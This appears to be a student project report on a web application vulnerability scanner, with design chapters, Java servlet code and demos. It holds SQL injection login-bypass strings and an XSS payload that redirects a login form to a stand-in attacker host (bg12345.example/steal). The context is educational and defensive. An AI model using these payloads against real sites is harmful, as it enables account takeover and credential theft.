Each style describes a system category that encompasses
(1) A set of components (e.g., a database, computational modules) that
perform a function required by a system.
(2) A set of connectors that enable communication, coordination and
cooperation among components.
(3) Constraints that define how components can be integrated to form the
system.
(4) Semantic models that enable a designer to understand the overall
properties of a system by analyzing the known properties of its parts.
Data-centered architectures
A data store (e.g., a file or database) resides at the center of this architecture
and is accessed frequently by other components that update, add, delete, or
otherwise modify data within the store.
Data-flow architectures
This architecture is applied when input data are to be transformed through a
series of computational or manipulative components into output data. A pipe and
filter pattern has a set of components, called filters, connected by pipes that
transmit data from one component to the next.
Layered architectures
A number of different layers are defined, each accomplishing operations
that progressively become closer to the machine instruction set. At the outer layer,
components service user interface operations.
Object-oriented architectures
The components of a system encapsulate data and the operations that must
be applied to manipulate the data. Communication and coordination between
components is accomplished via message passing.
Fig 4.1 Architectural diagram of WEB APPLICATION SCANNER
The architectural elements in Figure 4.1 identify the application domain of
Web App Scanner. The design uses structural and behavioral models, expressed as
use-case and activity diagrams, so the project is designed with an overview of
its patterns in UML.
4.2 DATA-FLOW MODEL
The data flow diagram enables the software engineer to develop models of
the information domain and functional domain at the same time. It takes an input-
process-output view of a system.
4.2.1 LEVEL 0 DFD
Fig 4.2.3 Level 2 DFD
4.3 INTERFACE DESIGN
The interface design elements for software tell how information flows into
and out of the system and how it is communicated among the components defined
as part of the architecture. There are three important elements of interface design:
- The User Interface (UI)
- The external interface to other systems, devices, networks, or other
  producers and consumers of information
- The internal interfaces between the various design components
These interface design elements allow the software to communicate
externally and also enable internal communication between the components. Web
App Scanner is developed around its User Interface designs, which drive the
working of the project, and around the internal interfaces developed to
integrate the modules. The User Interface is a distinct subsystem within the
overall Web App Scanner architecture. Design realization of the analysis
classes represents all operations and messaging schemes and provides
communication and collaboration between operations in the various classes and
modules.
CHAPTER 5
ATTACKS
5.1 SQL INJECTION
SQL Injection is one of the many web attack mechanisms used by attackers to
steal data from organizations. It is perhaps one of the most common application
layer attack techniques used today. It takes advantage of improper coding in a
web application that allows an attacker to inject SQL commands, for example
through a login form, and thereby gain access to the data held in the database.
In essence, SQL Injection arises because the fields available for user input
allow SQL syntax to pass through and reach the database query directly.
SQL INJECTION POSSIBILITIES
Using SQL injection, attackers can:
- Add new data to the database (perform an INSERT in the injected SQL). It
  could be embarrassing to find yourself selling politically incorrect items
  on an eCommerce site.
- Modify data currently in the database (perform an UPDATE in the injected
  SQL). It could be very costly to have an expensive item suddenly be deeply
  discounted.
- Often gain access to other users' system capabilities by obtaining their
  passwords.
Technologies affected by SQL injection:
- JSP, ASP, XML, XSL, JavaScript, VB
- MFC and other ODBC-based tools
- APIs, 3- and 4GL-based languages such as C, OCI, Pro*C, and COBOL
- Perl
- CGI scripts that access Oracle databases
- many more
Types of SQL Injections
- Blind SQL injection
- SQL injection
- Advanced SQL injection
Techniques in SQL Injections
- Authorization bypass
- Using the SELECT command
- Using the INSERT command
- Using SQL Server stored procedures
How to use SQL injection
Here is a sample basic HTML form with two inputs, login and
password.
The easiest way for login.asp to work is by building a database
query that looks like this:
SELECT id FROM logins WHERE username = '$username' AND
password = '$password'
If the variables $username and $password are taken directly from
the user's input, this can easily be compromised. Suppose that we gave
"Joe" as a username and that the following string was provided as a
password: anything' OR 'x'='x
The query then becomes:
SELECT id FROM logins WHERE username = 'Joe' AND password =
'anything' OR 'x'='x'
Because the inputs of the web application are not properly sanitised, the
single quotes have turned the WHERE clause into a two-part condition.
The 'x'='x' part is guaranteed to be true regardless of what the first part
contains.
This allows the attacker to bypass the login form without knowing a valid
username / password combination.
Depending on the actual SQL query, you may have to try some of
these possibilities:
- ' or 1=1
- or 1=1
- ' or 'a'='a
- " or "a"="a
- ') or ('a'='a
How to avoid SQL Injections
Filter out characters like single quote, double quote, slash, backslash,
semicolon, and extended characters like NULL, carriage return and new line in
all strings from:
- Input from users
- Parameters from URL
- Values from cookies
For a numeric value, convert it to an integer before placing it in the SQL
statement, or use ISNUMERIC to make sure it is a number. Character filtering on
its own is fragile (it does nothing for a numeric parameter that is concatenated
into the query without quotes); the reliable defence is to pass every
user-supplied value as a bound parameter of a prepared statement instead of
building the query text from it. Configure "Startup and run SQL Server" to use a
low-privilege account in the SQL Server Security tab, so that a successful
injection runs with the least privilege possible. Remove stored procedures that
you are not using, such as master..xp_cmdshell, xp_startmail, xp_sendmail and
sp_makewebtask.
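The login query from "How to use SQL injection" and the advice above, run for real against an in-memory SQLite database. This is an added example, not code from the report or its scanner; SQLite stands in for the ASP/SQL Server backend in the text, the logins table follows the report's query, and the items table and all rows are constructed sample data.

```python
import sqlite3

# Constructed sample data; table and column names for logins follow the
# report's query. The items table is added to show the numeric-parameter case.
SCHEMA = """
CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO logins VALUES (1, 'Joe', 's3cret');
INSERT INTO logins VALUES (2, 'admin', 'hunter2');
CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO items VALUES (1, 'laptop', 1200.0);
INSERT INTO items VALUES (2, 'phone', 800.0);
"""


def make_db():
    """Return an in-memory SQLite database loaded with the sample rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def login_vulnerable(con, username, password):
    """Build the query by concatenation, as the report's login.asp does.
    Returns the matched id, or None when no row matches."""
    sql = ("SELECT id FROM logins WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Same query with bound parameters: the values travel to the engine
    separately from the SQL text, so they can never change its structure."""
    row = con.execute(
        "SELECT id FROM logins WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def strip_quotes(value):
    """The character filter the report recommends (quotes removed)."""
    return value.replace("'", "").replace('"', "")


def item_vulnerable(con, item_id):
    """Numeric parameter concatenated without quotes. The quote filter is
    applied first and changes nothing, which is why filtering alone fails."""
    sql = "SELECT name FROM items WHERE id = " + strip_quotes(item_id)
    return con.execute(sql).fetchall()


def item_safe(con, item_id):
    """Convert to int first, as the report advises, then bind it.
    A non-numeric value raises ValueError instead of reaching the database."""
    return con.execute("SELECT name FROM items WHERE id = ?",
                       (int(item_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    bypass = "anything' OR 'x'='x"
    print("vulnerable login, Joe + bypass password:", login_vulnerable(db, "Joe", bypass))
    print("parameterised login, same input:        ", login_safe(db, "Joe", bypass))
    print("item id '2 OR 1=1' after quote filter:   ", item_vulnerable(db, "2 OR 1=1"))
```

Run stand-alone, the vulnerable login returns Joe's id for the bypass password while the parameterised version returns None, and the quote-filtered numeric lookup still returns every item.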
5.2 CROSS SITE SCRIPTING
Have you ever mistyped the address of a web site and received a message
like "Error - page name could not be found" or "The page you requested: page
name does not exist"? Certainly you have, and odds are you never gave it a second
thought; you simply corrected the address or went to a different site altogether. It
happens all the time. There are plenty of dead links, or links with typos, to stumble
upon. However, when you encounter an error message like the two listed above,
you are actually witnessing a potential security breach, not necessarily against the
site, but rather against you directly.
Suppose you entered the following valid URL:
http://www.example.com/FILENAME.html
If the document "FILENAME.html" did not exist, the web site could return
an error message such as
404 page does not exist: FILENAME.html
....
Notice that "FILENAME.html" is a string that you entered. The web site has
included it in the page returned straight through to your browser.
This may seem harmless, but now imagine that you are browsing through
auctions on a popular site; let's call it auction.example.com. You come across
several auctions that someone has posted and would like to see more items that the
same person has for sale; let's assume this person is a bad guy (though you don't
know it) and call him BG12345. You click on BG12345's website and see a listing
of his auctions. You click on a link on his page that interests you and are taken to
auction.example.com's site displaying that item. You scroll down to place a bid,
and the auction site prompts you for your name and password to sign in. You enter
all the information and hit the submit button. Everything looks fine, but in reality,
the information that you submit is being sent back to BG12345. How can this be?
The answer is that auction.example.com has what is known as a cross-site scripting
vulnerability (abbreviated CSS in the older CERT material cited in the references,
and XSS today).
A cross-site scripting vulnerability is caused by the failure of a site to
validate user input before returning it to the client's web browser. The essence of
cross-site scripting is that an intruder causes a legitimate web server to send a page
to a victim's browser that contains malicious script or HTML of the intruder's
choosing. The malicious script runs with the privileges of a legitimate script
originating from the legitimate web server, because the browser has no way to tell
that the content was supplied by a third party. The two error messages mentioned
earlier could be examples of such a situation. If instead of entering a page name
you entered an HTML or script tag, the server would have returned that tag to your
browser as well. Your browser would assume the HTML or script tag was from
auction.example.com. It would run the script with the privileges set up for that
site, and when you looked at the website, everything would appear to be normal.
BG12345 used the same method to deceive you. When you clicked on the
link to BG12345's auction, the link was actually to an invalid page. The link may
have looked something like the example in Fig 5.2; it used HTML and scripting to
mimic the auction site's page exactly. However, when you clicked submit, it used a
form that passed your information back to BG12345. Now BG12345 can access
your account, place bids, and change your information. BG12345 can also change
your password and lock you out of your own account. Even worse, BG12345 can
see the credit card number that you registered with.
So what did BG12345 do? BG12345's web site offered a link to
auction.example.com that looked something like this:
Fig 5.2 Cross-Site Scripting Attack
So what can be done?
- The best protection is to disable scripting when it isn't required. However,
  even this does not prevent the injection of malicious HTML. You should also
  protect yourself by accessing security-sensitive pages directly instead of
  following links from unknown sources or untrusted sites. For example, don't
  trust a link to your banking site that is in an email message. If you need to
  access your banking site, go there directly. And, as always, exercise caution
  when supplying personal information.
- Webmasters can also help. They can ensure that none of their pages return
  user input that has not been validated, and that any user-supplied value
  which is echoed into a page is HTML-encoded first. They can also encourage
  users to disable scripting.
- Another solution is to have signed scripting such that any script with an
  invalid or untrusted signature would not be run automatically. Suggestions
  of this nature, however, would require changes to the current Internet
  standards and specifications. Such changes would have to be submitted for
  consideration to the World Wide Web Consortium (www.w3c.org) or the
  Internet Engineering Task Force (www.ietf.org).
- If you notice an instance of cross-site scripting, notify the webmaster of
  that site, and cc the CERT Coordination Center.
Unfortunately, security is often sacrificed in favor of functionality. But if
you browse the Internet with scripting enabled, there is very little you can do
to protect your personal information. Cross-site scripting is easy to overlook,
and simple to correct. However, it can cause significant damage: your
passwords and credit card numbers can be unknowingly divulged to
untrusted sources.
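The reflected 404 page described in this section, rendered both as the vulnerable site would and with HTML encoding, together with the kind of probe a scanner can send to tell the two apart. This is an added example and not code from the report or its scanner; auction.example.com and the name BG12345 come from the text, while the bg12345.example host, the probe marker and the in-process "render" stand-in for a web server are constructed for the example.

```python
import html
import urllib.parse

# A marker no legitimate page would print unencoded. If it comes back
# byte-for-byte, the page reflected the input without HTML-encoding it.
PROBE = '<wsxss1 "x">'


def error_page_vulnerable(filename):
    """Echo the requested name straight into the HTML, like the 404 page in the text."""
    return ("<html><body><h1>404 page does not exist: " + filename
            + "</h1></body></html>")


def error_page_safe(filename):
    """Same page, but the untrusted value is HTML-encoded before it is emitted,
    so a <script> tag reaches the browser as text rather than as markup."""
    return ("<html><body><h1>404 page does not exist: "
            + html.escape(filename, quote=True) + "</h1></body></html>")


def attacker_link(site, payload):
    """Build the kind of link BG12345 would publish: the payload is URL-encoded
    into the path of the legitimate site, so the browser sends it there."""
    return site + "/" + urllib.parse.quote(payload, safe="")


def page_from_url(url, render):
    """Stand-in for the server: take the path as the requested file name,
    decode it, and render the error page with the given function."""
    path = urllib.parse.urlparse(url).path.lstrip("/")
    return render(urllib.parse.unquote(path))


def reflects_unescaped(render, probe=PROBE):
    """Scanner-style check: request the page with the probe as the file name
    and report whether it is reflected without encoding."""
    return probe in render(probe)


if __name__ == "__main__":
    payload = '<script>document.forms[0].action="http://bg12345.example/steal"</script>'
    link = attacker_link("http://auction.example.com", payload)
    print(link)
    print("vulnerable page reflects script:",
          payload in page_from_url(link, error_page_vulnerable))
    print("encoded page reflects script:   ",
          payload in page_from_url(link, error_page_safe))
    print("probe flags vulnerable/encoded: ",
          reflects_unescaped(error_page_vulnerable), reflects_unescaped(error_page_safe))
```

The probe uses a tag name and attribute that cannot occur naturally, so a hit is not a false positive; the encoded page returns it as `&lt;wsxss1 &quot;x&quot;&gt;`, which the check does not match.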
CHAPTER 6
TESTING
Testing is used to uncover as many errors as possible before delivering the
software to the customer. Software testing is a critical element of software quality
assurance and represents the ultimate review of specification, design and code
generation. Testing presents an interesting anomaly for the software engineer: it is
the one phase whose aim is to break what the earlier phases built. For a product to
acquire a level of reliability, it has to maintain the highest quality standard during
all the phases of software development.
Software testing techniques provide analysis of the entire system, validate the
internal logic of the software components, and exercise the input and output
control of the programs to reduce errors in system development and improve
performance.
6.1 VALIDATION TESTING
At the culmination of integration testing, when the software is completely
assembled as a package and interfacing errors have been uncovered and corrected,
a final series of software tests, validation testing, begins. Validation testing can be
defined in many ways, but a simple definition is that validation succeeds when the
software functions in a manner that can reasonably be expected by the
user/customer. Software validation produces one of two outcomes:
1) The functional or performance characteristics conform to specification and
are accepted.
2) A deviation from specification is uncovered and a deficiency list is created.
Errors discovered at this step in this project were corrected prior to completion,
with the user, by negotiating a method for resolving deficiencies. Thus the
proposed system under consideration has been tested using validation testing and
found to be working satisfactorily.
6.2 OUTPUT TESTING
6.2.1 DEVIATION
After validation testing, the next step is output testing of the proposed
system, since no system is useful if it does not produce the required output in the
specified format. The output generated or displayed by the system under
consideration was tested by asking the users about the format they required. Here,
the output format is considered in two ways: on screen and in printed form.
The on-screen output format was found to be correct, as the format was
designed in the system design phase according to the users' needs. For the hard
copy too, the output matched the requirement specified by the user. Hence, output
testing did not result in any correction to the system.
6.3 SYSTEM TESTING
The newly designed system is tested with sample data and the final outputs are
verified against the actual manual reports. If these reports are satisfactory, the
system is put into use with on-line data entry for the information system.
Thus, system testing aims to find discrepancies between the developed
system and its original objective, current specification and system
documentation. It also verifies the compatibility of the system with the
operational environment.
6.4 ACCEPTANCE TESTING
User acceptance of the system is the key factor for the success of any
system. The system under consideration was tested for user acceptance by
keeping in constant touch with the prospective system users during development
and making changes wherever required. This was done with regard to the
following points:
- Input Screen Design
- Output Screen Design
- On-line Messages to Guide the User
- Menu-driven System
- Format of ad-hoc Reports and other Outputs
CHAPTER 7
SCREENSHOTS
HOME PAGE
LOGIN PAGE
WRONG LOGIN
FORGOT PASSWORD
USER LOGIN PAGE
UPLOADING WAR FILE
SUCCESSFUL UPLOAD
SAMPLE DEMO APPLICATION
SCANNED REPORT OF UNATTACKED APPLICATION
SCANNED REPORT OF SQL INJECTION ATTACKED PAGE
CHAPTER 8
CONCLUSION
Web Application Scanner is an automated tool that helps detect attacks against
a web application. This report describes the most common attacks and provides
basic rules that can help create more attack-resistant web applications. The tool is
able to detect vulnerabilities in applications that are more complex. We did not rely
on any database of known bugs, so detection is not limited to previously
catalogued flaws. Finally, we conclude that Web Application Scanner will be
helpful in protecting our applications from attackers.
8.1 FUTURE ENHANCEMENT
Future enhancements are inevitable for any kind of software project. Some of
the enhancements that can be applied to our project are listed as follows.
1. In future we will design a tool which will be capable of detecting all the attacks.
2. We will provide an open source tool.
3. We will give solutions to the attacks.
4. We will detect and prevent all the attacks.
5. Scanned reports will be sent as mail to the customer.
APPENDIX
SAMPLE CODINGS
NEW USER DETAILS
/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package com.webscanner.javaobj;

/**
 * Value object holding the details entered on the new-user registration form,
 * including the payment card supplied at sign-up.
 *
 * Note on the card fields: PCI DSS does not permit the card verification value
 * (CVV) to be retained after authorisation, so this object must not be persisted
 * as-is; likewise the password should be stored only as a salted hash.
 *
 * @author Maran
 */
public class NewUserRDetails {

    private String _username;
    private String _firstname;
    private String _lastname;
    private String _password;
    private String _mailid;
    private String _date;
    private String _mobilenumber;
    private String _address1;
    private String _address2;
    private String _sequrityquestion;
    private String _answer;
    private String _usertype;
    private String _holder;
    private String _cardtype;
    private String _valid;
    private String _cvv;
    private String _mailid1;
    private String _issue;

    public NewUserRDetails(String _username, String _firstname, String _lastname,
            String _password, String _mailid, String _date, String _mobilenumber,
            String _address1, String _address2, String _sequrityquestion,
            String _answer, String _usertype, String _holder, String _cardtype,
            String _valid, String _cvv, String _mailid1, String _issue) {
        this._username = _username;
        this._firstname = _firstname;
        this._lastname = _lastname;
        this._password = _password;
        this._mailid = _mailid;
        this._date = _date;
        this._mobilenumber = _mobilenumber;
        this._address1 = _address1;
        this._address2 = _address2;
        this._sequrityquestion = _sequrityquestion;
        this._answer = _answer;
        this._usertype = _usertype;
        this._holder = _holder;
        this._cardtype = _cardtype;
        this._valid = _valid;
        this._cvv = _cvv;
        this._mailid1 = _mailid1;
        this._issue = _issue;
    }

    public String getAddress1() {
        return _address1;
    }

    public void setAddress1(String _address1) {
        this._address1 = _address1;
    }

    public String getAddress2() {
        return _address2;
    }

    public void setAddress2(String _address2) {
        this._address2 = _address2;
    }

    public String getAnswer() {
        return _answer;
    }

    public void setAnswer(String _answer) {
        this._answer = _answer;
    }

    public String getDate() {
        return _date;
    }

    public void setDate(String _date) {
        this._date = _date;
    }

    public String getFirstname() {
        return _firstname;
    }

    public void setFirstname(String _firstname) {
        this._firstname = _firstname;
    }

    public String getLastname() {
        return _lastname;
    }

    public void setLastname(String _lastname) {
        this._lastname = _lastname;
    }

    public String getMailid() {
        return _mailid;
    }

    public void setMailid(String _mailid) {
        this._mailid = _mailid;
    }

    public String getMobilenumber() {
        return _mobilenumber;
    }

    public void setMobilenumber(String _mobilenumber) {
        this._mobilenumber = _mobilenumber;
    }

    public String getPassword() {
        return _password;
    }

    public void setPassword(String _password) {
        this._password = _password;
    }

    public String getSequrityquestion() {
        return _sequrityquestion;
    }

    public void setSequrityquestion(String _sequrityquestion) {
        this._sequrityquestion = _sequrityquestion;
    }

    public String getUsername() {
        return _username;
    }

    public void setUsername(String _username) {
        this._username = _username;
    }

    public String getUsertype() {
        return _usertype;
    }

    public void setUsertype(String _usertype) {
        this._usertype = _usertype;
    }

    public String getHolder() {
        return _holder;
    }

    public void setHolder(String _holder) {
        this._holder = _holder;
    }

    public String getCardtype() {
        return _cardtype;
    }

    public void setCardtype(String _cardtype) {
        this._cardtype = _cardtype;
    }

    public String getIssue() {
        return _issue;
    }

    public void setIssue(String _issue) {
        this._issue = _issue;
    }

    public String getValid() {
        return _valid;
    }

    // Card expiry date. Deliberately not echoed to System.out: cardholder data
    // does not belong in the server log.
    public void setValid(String _valid) {
        this._valid = _valid;
    }

    public String getCvv() {
        return _cvv;
    }

    public void setCvv(String _cvv) {
        this._cvv = _cvv;
    }

    public String getMailid1() {
        return _mailid1;
    }

    public void setMailid1(String _mailid1) {
        this._mailid1 = _mailid1;
    }
}
LOGINPAGE
/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package com.webscanner.action;

import com.webscanner.dao.WebScannerDAO;
import java.io.IOException;
import javax.servlet.RequestDispatcher;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Login servlet: checks the submitted credentials through WebScannerDAO and
 * forwards a "gold" user to the gold user page, everyone else to failure.jsp.
 *
 * @author fostra
 */
public class loginpage extends HttpServlet {

    /**
     * Processes requests for both HTTP GET and POST methods.
     * @param request servlet request
     * @param response servlet response
     * @throws ServletException if a servlet-specific error occurs
     * @throws IOException if an I/O error occurs
     */
    protected void processRequest(HttpServletRequest request,
            HttpServletResponse response) throws ServletException, IOException {
        String username = request.getParameter("username");
        String password = request.getParameter("password");
        String buttonval = request.getParameter("buttonval");

        // getParameter() returns null when the field is absent, so compare with
        // the literal first; buttonval.equals("Login") would throw on a missing field.
        if ("Login".equals(buttonval)) {
            String userType = new WebScannerDAO().checkLogin(username, password);
            if (userType != null && userType.equalsIgnoreCase("gold")) {
                System.out.println("Login Successful");
                RequestDispatcher rs1 = request.getRequestDispatcher("/frmgolduser.jsp");
                rs1.forward(request, response);
            } else {
                System.out.println("Login Failure");
                RequestDispatcher rs2 = request.getRequestDispatcher("/failure.jsp");
                rs2.forward(request, response);
            }
        }
    }

    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        processRequest(request, response);
    }

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        processRequest(request, response);
    }
}
FORGOT PASSWORD
/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package com.webscanner.action;

import java.io.IOException;
import java.io.PrintWriter;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Looks up a user's stored password from the answers given on the
 * "forgot password" form.
 *
 * @author Maran
 */
public class ForgetPasswordAction extends HttpServlet {

    // The report does not show how the connection is obtained or which table is
    // queried. The JDBC URL and the table/column names below are placeholders
    // standing in for the project's own configuration.
    private static final String JDBC_URL = "jdbc:mysql://localhost/webscanner";
    private static final String LOOKUP_SQL =
            "SELECT password FROM users WHERE username = ? AND date = ?"
            + " AND mailid = ? AND question = ? AND answer = ?";

    /**
     * Processes requests for both HTTP GET and POST methods.
     * @param request servlet request
     * @param response servlet response
     * @throws ServletException if a servlet-specific error occurs
     * @throws IOException if an I/O error occurs
     */
    protected void processRequest(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        response.setContentType("text/html;charset=UTF-8");
        PrintWriter out = response.getWriter();
        try {
            String _username = request.getParameter("username");
            String _date = request.getParameter("date");
            String _month = request.getParameter("month");
            String _year = request.getParameter("year");
            String _mailid = request.getParameter("mailid");
            String _question = request.getParameter("question");
            String _answer = request.getParameter("answer");
            String password = "";

            // Every form value is bound as a parameter, so none of them can
            // alter the SQL text (compare the concatenated query in Section 5.1).
            Connection con = DriverManager.getConnection(JDBC_URL);
            PreparedStatement ps = con.prepareStatement(LOOKUP_SQL);
            ps.setString(1, _username);
            ps.setString(2, _date + "/" + _month + "/" + _year);
            ps.setString(3, _mailid);
            ps.setString(4, _question);
            ps.setString(5, _answer);
            ResultSet rs = ps.executeQuery();
            if (rs.next()) {
                password = rs.getString(1);
                // Being able to read the password back means it is stored in
                // recoverable form. Storing only a hash and mailing a one-time
                // reset link would remove that exposure; in any case the value
                // should not be written to the server log.
            }
            rs.close();
            ps.close();
            con.close();
        } catch (SQLException e) {
            throw new ServletException(e);
        } finally {
            out.close();
        }
    }

    /**
     * Handles the HTTP GET method.
     */
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        processRequest(request, response);
    }

    /**
     * Handles the HTTP POST method.
     */
    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        processRequest(request, response);
    }

    /**
     * Returns a short description of the servlet.
     * @return a String containing servlet description
     */
    @Override
    public String getServletInfo() {
        return "Short description";
    }
}
GOLD_USER PAGE
/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
package com.webscanner.action;

import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Page servlet for the "gold" user type that loginpage forwards to.
 *
 * @author fostra
 */
public class Gold_User_Page extends HttpServlet {

    /**
     * Processes requests for both HTTP GET and POST methods.
     * @param request servlet request
     * @param response servlet response
     * @throws ServletException if a servlet-specific error occurs
     * @throws IOException if an I/O error occurs
     */
    protected void processRequest(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        response.setContentType("text/html;charset=UTF-8");
        PrintWriter out = response.getWriter();
        try {
            // The page-generation logic is not reproduced in the report; only the
            // surrounding try/finally that closes the writer is shown.
        } finally {
            out.close();
        }
    }

    /**
     * Handles the HTTP GET method.
     */
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        processRequest(request, response);
    }

    /**
     * Handles the HTTP POST method.
     */
    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        processRequest(request, response);
    }

    /**
     * Returns a short description of the servlet.
     * @return a String containing servlet description
     */
    @Override
    public String getServletInfo() {
        return "Short description";
    }
}
REFERENCES
1. Ed Roman, Mastering Enterprise Java Beans, John Wiley & Sons Inc., 1999.
2. Elliotte Rusty Harold, Java Network Programming, O'Reilly, 2000.
3. H. M. Deitel, P. J. Deitel, Java: How to Program, Fifth edition, Prentice Hall of India Private Limited.
4. Horstmann & Cornell, Core Java 2: Advanced Features, Vol. II, Pearson Education, 2002.
5. Patrick Naughton, Complete Reference: Java 2, Tata McGraw-Hill, 2003.
6. Web reference: http://java.sun.com
Byte-code Engineering References
[AFM97] O. Agesen, S. N. Freund, and J. C. Mitchell. Adding Type Parameterization to the Java Language. In Proceedings OOPSLA'97, Atlanta, GA, 1997.
[AP98] D. Antonioli and M. Pilz. Statistische Analyse von Java-Classfiles. In Clemens Cap, editor, Proceedings JIT'98. Springer, 1998.
[BD98] B. Bokowski and M. Dahm. Poor Man's Genericity for Java. In Clemens Cap, editor, Proceedings JIT'98. Springer, 1998.
[BS98] B. Bokowski and A. Spiegel. Barat: A Front-End for Java. Technical report, Freie Universität Berlin, 1998.
[CCK98] Geoff Cohen, Jeff Chase, and David Kaminsky. Automatic Program Transformation with JOIE. In Proceedings USENIX Annual Technical Symposium, 1998.
[CCZ97] Suzanne Collin, Dominique Colnet, and Olivier Zendra. Type Inference for Late Binding. The SmallEiffel Compiler. In Proceedings JMLC'97, 1997.
SQL INJECTION REFERENCES
http://www.unixwiz.net/techtips/sql-injection.html
http://www.imperva.com/resources/glossary/sql_injection.html
http://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanners
CROSS SITE SCRIPTING REFERENCES
http://www.cert.org/advisories/CA-2000-02.html
http://www.cert.org/tech_tips/malicious_code_mitigation.html
http://www.kb.cert.org/vuls/id/672683
http://www.kb.cert.org/vuls/id/642239
http://www.kb.cert.org/vuls/id/560659